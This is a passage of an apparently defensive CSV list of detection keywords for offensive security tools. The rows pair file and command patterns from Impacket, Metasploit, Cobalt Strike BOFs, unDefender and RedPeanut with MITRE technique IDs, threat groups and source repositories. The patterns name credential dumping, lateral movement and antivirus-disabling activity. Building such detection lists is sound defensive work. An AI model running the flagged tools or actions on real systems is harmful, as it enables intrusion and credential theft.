movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket.smbconnection*","offensive_tool_keyword","smbcrawler","SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares","T1077 - T1021 - T1110 - T1083","TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement - Collection","https://github.com/SySS-Research/smbcrawler","1","1","N/A","N/A","2","129","13","2023-05-14T06:48:40Z","2021-06-09T19:27:08Z" +"*impacket/*.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket:latest*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket__init__*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket_findDelegation*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*impacket_rpcdump_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*impacket-atexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-dcomexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketfile.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*impacket-GetADUsers*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-GetNPUsers*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-getST*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-getTGT*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketldap_shell*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketlogger*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-lookupsid*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketmssqlshell*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-netview*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketntlmrelayx*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketos_ident*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-psexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-reg*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-reg*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","POST Exploitation tools","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketremcomsvc*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketrpcdatabase*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-rpcdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-samrdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketsecretsdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-secretsdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-secretsdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*impacketserviceinstall*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-services*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketsmbclient*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-smbclient*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-smbserver*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-ticketer*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketutils*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-wmiexec*","offensive_tool_keyword","AD exploitation cheat sheet","Command execution with WMI From Linux","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*impacket-wmiexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","POST Exploitation tools","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ImpactDecoder*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ImpactPacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impersonate_token *Administrator*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Incognito","10","10","N/A","N/A","N/A","N/A" +"*impersonate_token *BUILTIN\Administrators*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ImpersonateAndUnload.cpp*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" +"*ImpersonateLocalService*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" +"*ImpersonateLoggedOnUser*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*impersonateprocess.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - 